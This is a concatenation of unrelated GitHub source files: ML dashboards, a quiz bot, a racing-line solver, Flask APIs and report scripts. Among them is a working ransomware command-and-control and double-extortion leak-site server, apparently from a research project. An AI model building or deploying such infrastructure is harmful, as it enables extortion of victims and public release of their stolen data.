st.write(\"Score of Model: {}\".format(score))\n\nwith tab2:\n\n st.subheader(\"Select a model\")\n model = st.selectbox(\"Model\", (\"none\", \"K-Means Clustering\"))\n st.write(f\"Model: {model}\")\n\n # If K-Means clustering is selected, display a slider for selecting the number of clusters\n if model == \"K-Means Clustering\":\n \n #data_k= pd.read_csv(\"data/Updated_Subset_1.csv\")\n data_k = df.drop(columns=[\"label\"])\n st.write(\"Select the number of clusters:\")\n n_clusters = st.slider(\"Number of clusters\", min_value=2, max_value=10)\n\n # Apply K-Means clustering to the data\n kmeans = KMeans(n_clusters=n_clusters, n_init=\"auto\")\n kmeans.fit(data_k)\n groups = kmeans.labels_\n\n # Display the clustering results in a scatter plot\n pca = PCA(n_components=2)\n principal_components = pca.fit_transform(data_k)\n principal_df = pd.DataFrame(data=principal_components, columns=['PC1', 'PC2'])\n principal_df['group'] = groups\n # st.write(sns.scatterplot(data=principal_df, x='PC1', y='PC2', hue='label'))\n # scatter = sns.scatterplot(data=principal_df, x='PC1', y='PC2', hue='group')\n # st.write(scatter)\n chart = alt.Chart(principal_df).mark_circle(size=60).encode(\n x='PC1:Q',\n y='PC2:Q',\n color='group'\n ).properties(\n width=600,\n height=600\n )\n st.write('K-Mean Cluster')\n st.write(chart)\n\nwith tab3:\n #data_reg = pd.read_csv(\"data/Updated_Subset_1.csv\")\n data_reg = df.drop(columns=[\"label\"])\n st.write(\"Select the dependent variable:\")\n target_var = st.selectbox(\"Target Variable\", list(data_reg.columns))\n\n st.write(\"Select the independent variables:\")\n independent_vars = st.multiselect(\"Independent Variables\", list(data_reg.columns), default=['ekg_1'])\n\n # Train a Multiple Regression model and display the results\n X = data_reg[independent_vars]\n y = data_reg[target_var]\n reg = LinearRegression().fit(X, y)\n st.write(\"R-squared:\", reg.score(X, y))\n\n\nmain()\n\n\n","repo_name":"rishipalb/mHealthData","sub_path":"pages/03_Feature_Selection.py","file_name":"03_Feature_Selection.py","file_ext":"py","file_size_in_byte":7040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28837945227","text":"from aiogram import types, Dispatcher\nfrom aiogram.types import InlineKeyboardMarkup, InlineKeyboardButton, ParseMode\nfrom config import bot\n\n\nasync def quiz_2(call: types.CallbackQuery):\n markup = InlineKeyboardMarkup()\n button_call_2 = InlineKeyboardButton(\"NEXT\", callback_data='button_call_2')\n markup.add(button_call_2)\n\n question = \"Какая основная цель эзотерических языков программирования?\"\n answers = [\n \"Исследования границ возможностей разработки языков программирования\",\n \"Создание программ путем манипулирования визуальными объектами и эзотерическими формами\",\n \"Таких языков программирования не существует\"\n ]\n await bot.send_poll(\n chat_id=call.message.chat.id,\n question=question,\n options=answers,\n is_anonymous=False,\n type='quiz',\n correct_option_id=0,\n explanation=\"«Экзорцизм? 
нет, речь про Эзотеризм»\",\n explanation_parse_mode=ParseMode.MARKDOWN_V2,\n reply_markup=markup\n )\n\n\nasync def quiz_3(call: types.CallbackQuery):\n markup = InlineKeyboardMarkup()\n button_call_3 = InlineKeyboardButton(\"NEXT\", callback_data='button_call_3')\n markup.add(button_call_3)\n\n question = \"Как называется первый в мире высокоуровневый язык программирования?\"\n answers = [\n \"Фортран\",\n \"Ада\",\n \"Планкалкюль\"\n\n ]\n await bot.send_poll(\n chat_id=call.message.chat.id,\n question=question,\n options=answers,\n is_anonymous=False,\n type='quiz',\n correct_option_id=2,\n explanation=\"«Историю надо знать»\",\n explanation_parse_mode=ParseMode.MARKDOWN_V2,\n reply_markup=markup\n )\n\n\nasync def quiz_4(call: types.CallbackQuery):\n markup = InlineKeyboardMarkup()\n button_call_4 = InlineKeyboardButton(\"NEXT\", callback_data='button_call_4')\n markup.add(button_call_4)\n\n question = \"Кого называют «бабушкой Кобола»?\"\n answers = [\n \"Грейс Хоппер\",\n \"Ада Лавлейс\",\n \"Мэри Микер\"\n ]\n await bot.send_poll(\n chat_id=call.message.chat.id,\n question=question,\n options=answers,\n is_anonymous=False,\n type='quiz',\n correct_option_id=0,\n explanation=\"«Кобол это общий бизнес ориентированный язык \"\n \"Она разработала первый компилятор для компьютерного языка программирования»\",\n explanation_parse_mode=ParseMode.MARKDOWN_V2,\n reply_markup=markup\n )\n\n\nasync def quiz_5(call: types.CallbackQuery):\n markup = InlineKeyboardMarkup()\n button_call_5 = InlineKeyboardButton(\"NEXT\", callback_data='button_call_5')\n markup.add(button_call_5)\n\n question = \"Для чего Джоном Маккарти был создан язык программирования Лисп?\"\n answers = [\n \"Для работ по искусственному интеллекту\",\n \"Для управления бытовыми приборами\",\n \"Для реализации компьютерной модели вселенной\"\n ]\n await bot.send_poll(\n chat_id=call.message.chat.id,\n question=question,\n options=answers,\n is_anonymous=False,\n type='quiz',\n correct_option_id=0,\n explanation=\"«Джон Маккарти американский информатик, изобретатель»\",\n explanation_parse_mode=ParseMode.MARKDOWN_V2,\n reply_markup=markup\n )\n\n\nasync def quiz_6(call: types.CallbackQuery):\n markup = InlineKeyboardMarkup()\n button_call_6 = InlineKeyboardButton(\"NEXT\", callback_data='button_call_6')\n markup.add(button_call_6)\n\n question = \"Является ли язык программирования Си объектно-ориентированным?\"\n answers = [\n \"Да\",\n \"Нет\"\n ]\n await bot.send_poll(\n chat_id=call.message.chat.id,\n question=question,\n options=answers,\n is_anonymous=False,\n type='quiz',\n correct_option_id=1,\n explanation=\"«Легко, если значешь язык программирования Си»\",\n explanation_parse_mode=ParseMode.MARKDOWN_V2,\n reply_markup=markup\n )\n\n\nasync def quiz_7(call: types.CallbackQuery):\n markup = InlineKeyboardMarkup()\n button_call_7 = InlineKeyboardButton(\"NEXT\", callback_data='button_call_7')\n markup.add(button_call_7)\n\n question = \"К синтаксису каких языков программирования наиболее близок синтаксис C#?\"\n answers = [\n \"Фортран и Паскаль \",\n \"Ruby и Python\",\n \"C++ и Java\"\n ]\n await bot.send_poll(\n chat_id=call.message.chat.id,\n question=question,\n options=answers,\n is_anonymous=False,\n type='quiz',\n correct_option_id=2,\n explanation=\"«Легко, если значешь язык программирования C Sharp»\",\n explanation_parse_mode=ParseMode.MARKDOWN_V2,\n reply_markup=markup\n )\n\n\nasync def quiz_8(call: types.CallbackQuery):\n markup = InlineKeyboardMarkup()\n button_call_8 = InlineKeyboardButton(\"NEXT\", 
callback_data='button_call_8')\n markup.add(button_call_8)\n\n question = \"Что такое ассемблер?\"\n answers = [\n \"Низкоуровневый язык программирования\",\n \"Утилита трансляции программы в объектный код компьютера\",\n \"Высокоуровневый язык программирования\"\n ]\n await bot.send_poll(\n chat_id=call.message.chat.id,\n question=question,\n options=answers,\n is_anonymous=False,\n type='quiz',\n correct_option_id=1,\n explanation=\"«Ассемблер не путать с языком ассемблера»\",\n explanation_parse_mode=ParseMode.MARKDOWN_V2,\n reply_markup=markup\n )\n\n\nasync def quiz_9(call: types.CallbackQuery):\n markup = InlineKeyboardMarkup()\n button_call_9 = InlineKeyboardButton(\"NEXT\", callback_data='button_call_9')\n markup.add(button_call_9)\n\n question = \"С какого языка началась традиция использования фразы «Hello, world!» в самой первой программе \" \\\n \"при изучении нового языка программирования?\"\n answers = [\n \"Си\",\n \"C#\",\n \"C++\",\n \"Java\"\n ]\n await bot.send_poll(\n chat_id=call.message.chat.id,\n question=question,\n options=answers,\n is_anonymous=False,\n type='quiz',\n correct_option_id=0,\n explanation=\"«Надо знать историю»\",\n explanation_parse_mode=ParseMode.MARKDOWN_V2,\n reply_markup=markup\n )\n\n\nasync def quiz_10(call: types.CallbackQuery):\n markup = InlineKeyboardMarkup()\n button_call_10 = InlineKeyboardButton(\"NEXT\", callback_data='button_call_10')\n markup.add(button_call_10)\n photo = open(\"media/python_quiz2.png\", 'rb')\n await bot.send_photo(call.message.chat.id, photo=photo)\n question = \"Что выведет код?\"\n answers = [\n \"'¯\\\\\\_(ツ)_//¯'\",\n \"'¯\\_(ツ)_//¯'\",\n \"'¯\\\\\\_(ツ)_/¯'\",\n \"Ничего из перечисленного\"\n ]\n await bot.send_poll(\n chat_id=call.message.chat.id,\n question=question,\n options=answers,\n is_anonymous=False,\n type='quiz',\n correct_option_id=1,\n explanation=\"«Последовательности в Python\",\n explanation_parse_mode=ParseMode.MARKDOWN_V2,\n reply_markup=markup\n )\n\n\nasync def quiz_11(call: types.CallbackQuery):\n photo = open(\"media/python_quiz.png\", 'rb')\n await bot.send_photo(call.message.chat.id, photo=photo)\n question = \"Что выведет код? 
\"\n answers = [\n \"50 100\",\n \"50\",\n \"100\",\n \"Ни один из этих вариантов\"\n ]\n await bot.send_poll(\n chat_id=call.message.chat.id,\n question=question,\n options=answers,\n is_anonymous=False,\n type='quiz',\n correct_option_id=2,\n explanation=\"«Хитрый оператор AND в Python»\",\n explanation_parse_mode=ParseMode.MARKDOWN_V2\n )\n\n\ndef register_handlers_callback(dp: Dispatcher):\n dp.register_callback_query_handler(quiz_2, lambda call: call.data == \"button_call_1\")\n dp.register_callback_query_handler(quiz_3, lambda call: call.data == \"button_call_2\")\n dp.register_callback_query_handler(quiz_4, lambda call: call.data == \"button_call_3\")\n dp.register_callback_query_handler(quiz_5, lambda call: call.data == \"button_call_4\")\n dp.register_callback_query_handler(quiz_6, lambda call: call.data == \"button_call_5\")\n dp.register_callback_query_handler(quiz_7, lambda call: call.data == \"button_call_6\")\n dp.register_callback_query_handler(quiz_8, lambda call: call.data == \"button_call_7\")\n dp.register_callback_query_handler(quiz_9, lambda call: call.data == \"button_call_8\")\n dp.register_callback_query_handler(quiz_10, lambda call: call.data == \"button_call_9\")\n dp.register_callback_query_handler(quiz_11, lambda call: call.data == \"button_call_10\")\n","repo_name":"TataRus2006/GeekTech_home_work_month_3","sub_path":"handlers/callback.py","file_name":"callback.py","file_ext":"py","file_size_in_byte":9947,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"17373087353","text":"import numpy as np\nfrom scipy import interpolate\n\n# All of this, is just an implementation of this:\n# ref: http://phungdinhthang.com/2016/12/16/calculate-racing-lines-automatically/?i=1\n\n\ndef get_normal(point_a, point_b):\n v = (point_b[0] - point_a[0], point_b[1] - point_a[1])\n ln = float(np.linalg.norm(v))\n u = (v[0] / ln, v[1] / ln)\n\n return (-u[1], u[0])\n\n\ndef generate_offset_points(spline, resolution=100, distance=0.05):\n x, y = interpolate.splev(np.linspace(0, 1, int(resolution + 1)), spline)\n\n points = list(zip(list(x), list(y)))\n normals = [get_normal(point, points[i - 1])\n for i, point in enumerate(points[1:])]\n\n offset = [\n (\n point[0] + normal[0] * distance,\n point[1] + normal[1] * distance\n )\n for point, normal in zip(points, normals)]\n\n return list(zip(*offset))\n\n\nclass Line:\n def __init__(self, prev, points):\n self.prev = prev\n self.nodes = [Node(self, point) for point in points]\n self.next = None\n\n if self.prev:\n self.prev.set_next(self)\n\n def set_next(self, node):\n self.next = node\n\n\nclass Node:\n def __init__(self, line, point):\n self.line = line\n self.point = point\n self.rvm_value = {}\n self.rvm_next_node = {}\n\n\ndef generate_nodes(spline, width, res=50, segments=5):\n nodes = [\n list(zip(\n *generate_offset_points(spline, res,\n width / 2 - width / (segments - 1) * i)\n ))\n for i in range(segments)]\n\n nodes = list(zip(*nodes))\n\n return nodes\n\n\ndef fitness_function(prev, curr, nxt, alpha, beta):\n A = (curr[0] - prev[0], curr[1] - prev[1])\n B = (nxt[0] - curr[0], nxt[1] - curr[1])\n\n a = np.linalg.norm(A)\n b = np.linalg.norm(B)\n\n cos_p = (A[0] * B[0] + A[1] * B[1]) / (a * b)\n\n return alpha * cos_p - beta * (a + b)\n\n\ndef get_best_rvm(curr_line, alpha, beta):\n if not curr_line.next:\n return\n if not curr_line.prev:\n for curr_node, next_node in zip(curr_line.nodes, curr_line.next.nodes):\n curr_node.rvm_value = next_node.rvm_value\n 
curr_node.rvm_next_node = next_node.rvm_next_node\n return\n\n for i, node in enumerate(curr_line.nodes):\n for j, prev_node in enumerate(curr_line.prev.nodes):\n max_route_val = -np.inf\n max_node = None\n for k, next_node in enumerate(curr_line.next.nodes):\n this_route_val = fitness_function(\n prev_node.point, node.point, next_node.point, alpha, beta) \\\n + next_node.rvm_value.get(i, 0)\n if this_route_val > max_route_val:\n max_route_val = this_route_val\n max_node = k\n node.rvm_value[j] = max_route_val\n node.rvm_next_node[j] = max_node\n\n\ndef walk_nodes(line, start_i):\n curr_i = start_i\n while line:\n node = line.nodes[curr_i]\n yield node.point\n curr_i = node.rvm_next_node.get(curr_i, 0)\n line = line.next\n\n\ndef calculate_racing_line(spline, width, res=50, segments=5, alpha=0.5, beta=0.5): # noqa E501\n nodes = generate_nodes(spline, width, res, segments)\n\n lines = []\n for i, line in enumerate(nodes):\n lines.append(Line(lines[i - 1] if i != 0 else None, line))\n\n for line in reversed(lines):\n get_best_rvm(line, alpha, beta)\n\n start_index = max(\n range(segments), key=lambda i: lines[0].nodes[i].rvm_value[i]\n )\n\n paths = [list(walk_nodes(lines[0], i)) for i in range(segments)]\n\n best_path = list(walk_nodes(lines[1], start_index)) # TODO: auto select best loop path\n\n return nodes, paths, best_path\n\n\ndef to_spline(points):\n \"\"\"\n Given a set of numpy points, calculate spline\n \"\"\"\n x, y = points\n try:\n x_wrap = np.r_[x, x[0]]\n y_wrap = np.r_[y, y[0]]\n tck, _ = interpolate.splprep([x_wrap, y_wrap], s=0, per=True)\n except Exception:\n tck, _ = interpolate.splprep([x, y], s=0, per=True)\n return tck\n","repo_name":"jamesheavey/FSAI-Sim","sub_path":"vehicle_evaluator/vehicle_evaluator/racingline_calculator.py","file_name":"racingline_calculator.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33112505936","text":"import os\n\nfrom flask import Flask, jsonify, request\nfrom diet import Diet\n\nimport pymongo\n\n# initialize\napp = Flask(__name__)\n\nport_for_mongo = os.environ.get(\"PORT_FOR_MONGO\")\n\nclient = pymongo.MongoClient(\"mongodb://mongo:{0}/\".format(port_for_mongo))\ndb = client[\"food_planner_db\"]\ndiets_collection = db[\"diets\"]\n\nall_diets = []\n\n\ndef update_all_diets_from_db():\n \"\"\"\n deletes the all_diets list and replace it with a new list.\n takes the information from the DB and puts it the new list.\n the result is an updated all_diets list\n \"\"\"\n global all_diets\n all_diets = []\n # defines the projection (fields to include/exclude)\n projection = {'_id': 0, 'sugar': 1, 'cal': 1, 'sodium': 1, 'name': 1}\n\n # find documents and apply the projection\n diets_list_from_db = list(diets_collection.find({}, projection))\n\n # iterates over the results and adds them to the all_diets list\n for diet_from_db in diets_list_from_db:\n all_diets.append(Diet(diet_from_db.get(\"name\"), diet_from_db.get(\"cal\"), diet_from_db.get(\"sodium\"),\n diet_from_db.get(\"sugar\")))\n\n\n# initializes the meals and dished from DB\nupdate_all_diets_from_db()\n\n\ndef find_diet_in_all_diets_by_name(new_diet_name: str):\n \"\"\"\n finds the first diet object the matches a given name\n :param new_diet_name: a string the represents the diet name to find\n :return: a Diet object that matches the new_new_diet_name, and None if no such Diet object exists\n \"\"\"\n global all_diets\n for diet in all_diets:\n if diet.name == 
new_diet_name:\n return diet\n return None\n\n\n@app.route('/diets', methods=['POST'])\ndef diets_post():\n successfully_create_message = \"Diet {} was created successfully\"\n diet_name_already_exist_message = \"Diet with {} already exists\"\n not_json_content_type_message = \"POST expects content type to be application/json\"\n\n # checks the content type of the request\n if request.content_type != \"application/json\":\n return jsonify(not_json_content_type_message), 415\n\n new_json_body = request.json\n diet_name = new_json_body.get('name')\n diet_cal = new_json_body.get('cal')\n diet_sodium = new_json_body.get('sodium')\n diet_sugar = new_json_body.get('sugar')\n\n if diet_name is None or diet_cal is None or diet_sodium is None or diet_sugar is None:\n return jsonify(\"Incorrect POST format\"), 422\n\n if find_diet_in_all_diets_by_name(diet_name) is not None:\n return jsonify(diet_name_already_exist_message.format(diet_name)), 422\n\n new_diet = Diet(diet_name, diet_cal, diet_sodium, diet_sugar)\n all_diets.append(new_diet)\n diets_collection.insert_one(new_diet.asdict())\n\n return jsonify(successfully_create_message.format(diet_name)), 201\n\n\n@app.route('/diets', methods=['GET'])\ndef diets_get():\n global all_diets\n update_all_diets_from_db()\n return jsonify([diet.asdict() for diet in all_diets]), 200\n\n\n@app.route('/diets/', methods=['GET'])\ndef diets_name_get(name):\n update_all_diets_from_db()\n existing_diet = find_diet_in_all_diets_by_name(name)\n\n if existing_diet is not None:\n return jsonify(existing_diet.asdict()), 200\n else:\n return jsonify(\"Diet {} not found\".format(name)), 404\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=80, debug=True)\n","repo_name":"itayf9/Meals_App_With_Microservices","sub_path":"diets/diets_main.py","file_name":"diets_main.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"4956066116","text":"from connect.client import R\n\nfrom reports.fields import Field, Fields\nfrom reports.utils import convert_to_datetime, get_value, today_str\n\nFIELDS = Fields((\n Field('Request ID', lambda r: get_value(r, 'id')),\n Field('Request Type', lambda r: get_value(r, 'type')),\n Field('Request Status', lambda r: get_value(r, 'status')),\n Field('Created At', lambda r: convert_to_datetime(get_value(r, 'created'))),\n Field('Updated At', lambda r: convert_to_datetime(get_value(r, 'updated'))),\n Field('Exported At', lambda _: today_str()),\n Field('Customer ID', lambda r: get_value(r, 'asset.tiers.customer.id')),\n Field('Customer Name', lambda r: get_value(r, 'asset.tiers.customer.name')),\n Field('Customer TaxID', lambda r: get_value(r, 'asset.tiers.customer.tax_id')),\n Field('Customer External ID', lambda r: get_value(r, 'asset.tiers.customer.external_id')),\n Field('Tier 1 ID', lambda r: get_value(r, 'asset.tiers.tier1.id')),\n Field('Tier 1 Name', lambda r: get_value(r, 'asset.tiers.tier1.name')),\n Field('Tier 1 External ID', lambda r: get_value(r, 'asset.tiers.tier1.external_id')),\n Field('Tier 2 ID', lambda r: get_value(r, 'asset.tiers.tier2.id')),\n Field('Tier 2 Name', lambda r: get_value(r, 'asset.tiers.tier2.name')),\n Field('Tier 2 External ID', lambda r: get_value(r, 'asset.tiers.tier2.external_id')),\n Field('Provider ID', lambda r: get_value(r, 'asset.connection.provider.id')),\n Field('Provider Name', lambda r: get_value(r, 'asset.connection.provider.name')),\n Field('Vendor ID', lambda r: get_value(r, 
'asset.connection.vendor.id')),\n Field('Vendor Name', lambda r: get_value(r, 'asset.connection.vendor.name')),\n Field('Product ID', lambda r: get_value(r, 'asset.product.id')),\n Field('Product Name', lambda r: get_value(r, 'asset.product.name')),\n Field('Asset ID', lambda r: get_value(r, 'asset.id')),\n Field('Asset External ID', lambda r: get_value(r, 'asset.external_id')),\n Field('Transaction Type', lambda r: get_value(r, 'asset.connection.type')),\n Field('Hub ID', lambda r: get_value(r, 'asset.connection.hub.id')),\n Field('Hub Name', lambda r: get_value(r, 'asset.connection.hub.name')),\n Field('Asset Status', lambda r: get_value(r, 'asset.status')),\n))\n\n\ndef generate(\n client=None,\n parameters=None,\n progress_callback=None,\n renderer_type=None,\n extra_context_callback=None,\n):\n requests = _get_requests(client, parameters)\n progress = 0\n total = requests.count()\n if renderer_type == 'csv':\n yield FIELDS.names()\n progress += 1\n total += 1\n progress_callback(progress, total)\n\n for request in requests:\n values = FIELDS.process(request)\n if renderer_type == 'json':\n yield dict(zip(FIELDS.json_names(), values))\n else:\n yield values\n progress += 1\n progress_callback(progress, total)\n\n\ndef _get_requests(client, parameters):\n all_types = ['tiers_setup', 'inquiring', 'pending', 'approved', 'failed', 'draft']\n\n query = R()\n query &= R().created.ge(parameters['date']['after'])\n query &= R().created.le(parameters['date']['before'])\n\n if parameters.get('product') and parameters['product']['all'] is False:\n query &= R().asset.product.id.oneof(parameters['product']['choices'])\n if parameters.get('rr_type') and parameters['rr_type']['all'] is False:\n query &= R().type.oneof(parameters['rr_type']['choices'])\n if parameters.get('rr_status') and parameters['rr_status']['all'] is False:\n query &= R().status.oneof(parameters['rr_status']['choices'])\n else:\n query &= R().status.oneof(all_types)\n if parameters.get('mkp') and parameters['mkp']['all'] is False:\n query &= R().asset.marketplace.id.oneof(parameters['mkp']['choices'])\n if parameters.get('hub') and parameters['hub']['all'] is False:\n query &= R().asset.connection.hub.id.oneof(parameters['hub']['choices'])\n if parameters.get('environment') and parameters['environment']['all'] is False:\n query &= R().asset.connection.type.oneof(parameters['environment']['choices'])\n\n return client.requests.filter(query)\n","repo_name":"TelefonicaTC2Tech/yssb-devi-reports","sub_path":"reports/fulfillment_requests_taxid/entrypoint.py","file_name":"entrypoint.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"12025918675","text":"\"\"\"Command and Control webserver \n\nA Webserver that is uesed for Command and Control tasks of Malware/Ransomware.\n\nFurther more it can function as a leak / publish webserver for clients which did not pay a ransom.\n\nData leak feature uses zips.\n\"\"\"\n\nimport datetime\nimport logging\nfrom datetime import date\nfrom os import path\n\nfrom Crypto.Random import get_random_bytes\nfrom flask import Flask, render_template, request, send_file\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom .datastorage import get_toc_of_zip\nfrom .db import client_class_factory\nfrom flask_session import Session\n\nlogger = logging.getLogger(__name__)\n\n\ndef webserver_factory(path_to_db=r\"database.db\", leaked_data_storage=r\"\") -> Flask:\n # pylint: disable=no-member\n \"\"\"Create and 
return a Flask instance.\n\n Args:\n path_to_db (regexp, optional): _description_. Defaults to r\"database.db\".\n leaked_data_storage (str, optional): _description_. Defaults to \"\".\n\n Returns:\n Flask: The webserver object.\n \"\"\"\n\n app = Flask(__name__)\n app.secret_key = get_random_bytes(32)\n app.config[\"SESSION_TYPE\"] = \"filesystem\"\n # configure the SQLite database, relative to the app instance folder\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = r\"sqlite:///\" + path_to_db\n\n database = SQLAlchemy(app)\n Client = client_class_factory(database.Model) # pylint: disable=C0103\n Session(app)\n\n @app.template_filter(\"date\")\n def _jinja2_filter_date(date_to_convert):\n return date_to_convert.isoformat(sep=\" \", timespec=\"hours\").split(\" \")[0]\n\n @app.template_filter(\"datetime\")\n def _jinja2_filter_datetime(date_to_convert):\n return date_to_convert.isoformat(sep=\" \", timespec=\"minutes\")\n\n # Add subpaths for double extortion.\n flag_leak_data = leaked_data_storage != \"\"\n\n if flag_leak_data:\n app.logger.info(\n \"Using double extortion (leak data). Looking in %s for leaked data\",\n leaked_data_storage,\n )\n\n # Main leak page of all clients.\n @app.route(\"/leak/\")\n def leak():\n clients_found = Client.query.all()\n app.logger.info(\"Found %s leaked clients to display.\", len(clients_found))\n return render_template(\n \"leak.html\", dt=datetime.datetime.now(), clients=clients_found\n )\n\n # Specific page of a client.\n @app.route(\"/leak/\")\n def leak_client(guid):\n client_found = Client.query.filter_by(guid=guid).first()\n app.logger.info(\"Display details of client: %s \", client_found)\n if client_found is None:\n return \"bad request!\"\n\n resource = path.join(leaked_data_storage, client_found.guid + \".zip\")\n publish = False\n\n # Not payed but time left to pay\n data = \"\"\n if (\n client_found.payed_at is None\n and date.today() < client_found.release_date_of_data.date()\n ):\n publish = False\n # Payed in time.\n elif (\n client_found.payed_at is not None\n and client_found.payed_at.date()\n < client_found.release_date_of_data.date()\n ):\n publish = False\n else:\n if path.isfile(resource):\n data = get_toc_of_zip(resource)\n publish = True\n else:\n publish = False\n\n\n return render_template(\n \"leaked_client.html\",\n client=client_found,\n publish=publish,\n dt=datetime.datetime.now(),\n data=data,\n )\n\n # Download leaked files of the given client.\n @app.route(\"/api/leak-file/\")\n def api_client(guid):\n client_found = Client.query.filter_by(guid=guid).first()\n app.logger.info(\"Download leaked data of client: %s \", client_found.guid)\n\n if client_found is None:\n return \"bad request!\"\n\n # Did not pay at all\n if (client_found.payed_at is None and date.today() >= client_found.release_date_of_data.date()):\n resource = path.join(leaked_data_storage, client_found.guid + \".zip\")\n if path.isfile(resource):\n return send_file(resource, as_attachment=True)\n return \"No resource\"\n\n # API path to change the date of data leak release.\n @app.route(\"/publish/\", methods=[\"PATCH\"])\n def publish(guid):\n client_found = Client.query.filter_by(guid=guid).first()\n json = request.get_json()\n json = datetime.datetime.strptime(json[\"date\"], \"%Y-%m-%d\")\n\n app.logger.info(\"%s\", json)\n app.logger.info(\"Enabling download of leaked data from %s\", client_found)\n client_found.release_date_of_data = json\n database.session.commit()\n return \"ok\"\n\n else:\n app.logger.info(\"Not using double extortion (leak 
data)\")\n\n # Main page for controlling the clients.\n @app.route(\"/\")\n def main():\n clients_found = Client.query.all()\n app.logger.info(\"Number of compromised clients:%s\", len(clients_found))\n return render_template(\n \"main.html\",\n clients=clients_found,\n dt=datetime.datetime.now(),\n flag_leak_data=flag_leak_data,\n )\n\n # API path to allow decryption.\n @app.route(\"/decrypt/\", methods=[\"PATCH\"])\n def decrypt(guid):\n client_found = Client.query.filter_by(guid=guid).first()\n\n app.logger.info(\"Enabling decryption of %s\", client_found)\n client_found.decrypt = True\n database.session.commit()\n\n return \"ok\"\n\n return app\n\n\nif __name__ == \"__main__\":\n webserver_factory(\n path_to_db=r\"C:\\\\database.db\",\n leaked_data_storage=r\"C:\\\\\\\",\n ).run(debug=True)\n","repo_name":"wenzfe/analysis-of-ransomware-attacks","sub_path":"src/package_mwutils/mwutils/server/webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":6006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19707730152","text":"import sys\nsys.path.append(\"../src\")\n\nfrom decay import decay\n\n\n# Set path to isotopes dictionary\ndecay.set(\"../data/isotopes.p\")\n\n# Create isotope chain dictionary\nidata = {}\n\n# Set parent isotope\nparent = 88226\n\n# Set time at which to calculate activity\ntime = 86400\n\nchain_isotopes = decay.chain_isotopes(parent)\n#decay.print_unique_isotopes(chain_isotopes)\n\nresults = decay.calculate(88226, 10000, time_steps=20, time_units='yr', parent_activity=1.0, activity_units='Bq', log='results/88ra226.txt', plot_name='results/88ra226.eps')\n\n\nprint(results)\n\n\n\n\n\n\n","repo_name":"BenPalmer1983/decay","sub_path":"examples2/88ra226.py","file_name":"88ra226.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7566891415","text":"from collections import OrderedDict\n\nimport numpy as np\nimport scipy.stats\n\n\n# Statistics Registry base classe\nclass Registry:\n def __init__(self, fallback=None):\n self._fallback = fallback\n self.__store = {}\n\n def _store(self, *keys, value=None):\n store = self.__store\n for key in keys[:-1]:\n if key not in store:\n store[key] = {}\n store = store[key]\n store[keys[-1]] = value\n\n def _fetch(self, *keys):\n try:\n store = self.__store\n for key in keys[:-1]:\n store = store[key]\n return store[keys[-1]]\n except KeyError:\n if self._fallback:\n return self._fallback._fetch(*keys)\n raise\n\n def _keys(self, *keys):\n try:\n store = self.__store\n for key in keys:\n store = store[key]\n out = list(store)\n except KeyError:\n out = []\n if self._fallback:\n out += self._fallback._keys(*keys)\n return out\n\n def register(self):\n raise NotImplementedError\n\n\nclass AggregationRegistry(Registry):\n def register(self, name, backend, agg):\n return self._store(name, backend, value=agg)\n\n def get(self, name, backend):\n return self._fetch(name, backend)\n\n def list(self):\n return self._keys()\n\n def list_backends(self, name):\n return self._keys(name)\n\n def for_backend(self, name):\n return {\n agg: self._fetch(agg, backend)\n for agg in self._keys()\n for backend in self._keys(agg)\n if backend == name\n }\n\n def for_provider(self, provider):\n if not provider.REGISTRY_KEYS:\n raise RuntimeError(\n \"Provider {} is not an instance of any registered backend.\".format(\n provider\n )\n )\n return 
self.for_backend(provider.REGISTRY_KEYS[0])\n\n\nclass TransformRegistry(Registry):\n def register(self, name, backend, transform):\n return self._store(name, backend, value=transform)\n\n def get(self, name, backend):\n return self._fetch(name, backend)\n\n def list(self):\n return self._keys()\n\n def list_backends(self, name):\n return self._keys(name)\n\n def for_backend(self, name):\n return {\n agg: self._fetch(agg, backend)\n for agg in self._keys()\n for backend in self._keys(agg)\n if backend == name\n }\n\n def for_provider(self, provider):\n if not provider.REGISTRY_KEYS:\n raise RuntimeError(\n \"Provider {} is not an instance of any registered backend.\".format(\n provider\n )\n )\n return self.for_backend(provider.REGISTRY_KEYS[0])\n\n\nclass DistributionRegistry(Registry):\n def register(self, name, stats, scipy_class, scipy_params):\n return self._store(\n name,\n value={\n \"stats\": stats,\n \"scipy_class\": scipy_class,\n \"scipy_params\": scipy_params,\n },\n )\n\n def get(self, name):\n return self._fetch(name)\n\n def get_stats(self, name):\n return self.get(name)[\"stats\"]\n\n def get_scipy_repr(self, name):\n dist = self.get(name)\n return (dist[\"scipy_class\"], dist[\"scipy_params\"])\n\n def list(self):\n return self._keys()\n\n\nclass StatsRegistry:\n def __init__(\n self, aggregations=None, transforms=None, distributions=None, fallback=None\n ):\n self.aggregations = aggregations or AggregationRegistry(\n fallback=fallback.aggregations if fallback else None\n )\n self.transforms = transforms or TransformRegistry(\n fallback=fallback.transforms if fallback else None\n )\n self.distributions = distributions or DistributionRegistry(\n fallback=fallback.distributions if fallback else None\n )\n\n def distribution_for_provider(self, distribution, provider):\n backend = provider.REGISTRY_KEYS[0]\n fields = self.distributions.get_stats(distribution)\n return OrderedDict(\n [\n (name, self.aggregations.get(agg, backend))\n for name, agg in fields.items()\n ]\n )\n\n\n# Create and populate global stats registry\n\nglobal_stats_registry = StatsRegistry()\nregister_distn = global_stats_registry.distributions.register\n\n# Raw distribution (distribution thrown away or manually recorded)\nregister_distn(\n name=None,\n stats=OrderedDict(\n [\n (\"raw\", \"raw\"),\n ]\n ),\n scipy_class=None,\n 